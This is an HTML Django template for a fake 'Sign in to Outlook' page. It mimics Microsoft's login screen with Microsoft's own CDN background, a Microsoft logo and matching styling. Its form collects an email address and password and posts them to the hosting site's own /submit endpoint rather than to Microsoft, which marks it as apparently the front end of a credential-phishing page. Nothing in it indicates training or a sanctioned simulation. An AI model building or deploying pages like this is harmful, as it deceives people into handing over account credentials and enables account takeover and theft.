{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Sign in to Outlook</title>
  <link rel="stylesheet" type="text/css" href="{% static 'css/styles.css' %}">
  <style>
    body {
      background-image: url(https://logincdn.msftauth.net/shared/5/images/fluent_web_light_2_145a07dcb971527a82b8.svg);
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      font-family: Arial, sans-serif;
      background-color: #f3f3f3;
    }
    .container {
      background-color: white;
      padding: 2rem;
      border-radius: 12px;
      box-shadow: 0 4px 12px rgba(0,0,0,0.1);
      width: 320px;
    }
    h1 {
      text-align: center;
      font-size: 1.2rem;
      color: #0078d4;
      margin-bottom: 1.5rem;
    }
    p{
      color: grey;
      font-size: 14px;
      text-align: center;
    }
    input {
      width: 100%;
      margin-bottom: 1rem;
      border: 1px solid #ccc;
      border-radius: 6px;
    }
    button {
      width: 100%;
      padding: 10px;
      background: #0078d4;
      color: white;
      border: none;
      border-radius: 6px;
      cursor: pointer;
      font-size: 1rem;
    }
    button:hover {
      background: #005a9e;
    }
    img{
      display: block;
      width: 150px;
      align-self: center;
      margin: auto;
    }
  </style>
</head>
<body>
  <div class="container">
    <img src="/media/microsoft-logo.png" alt="Microsoft Logo">
    <h1>Sign in</h1>
    <p>Use your Microsoft Account</p>
    <form action="/submit" method="POST">
      {% csrf_token %}
      <input type="email" name="email" placeholder="Email or Phome Nubmer" required>
      <input type="password" name="password" placeholder="Password">
      <button type="submit">Sign in</button>
    </form>
  </div>
</body>
</html>
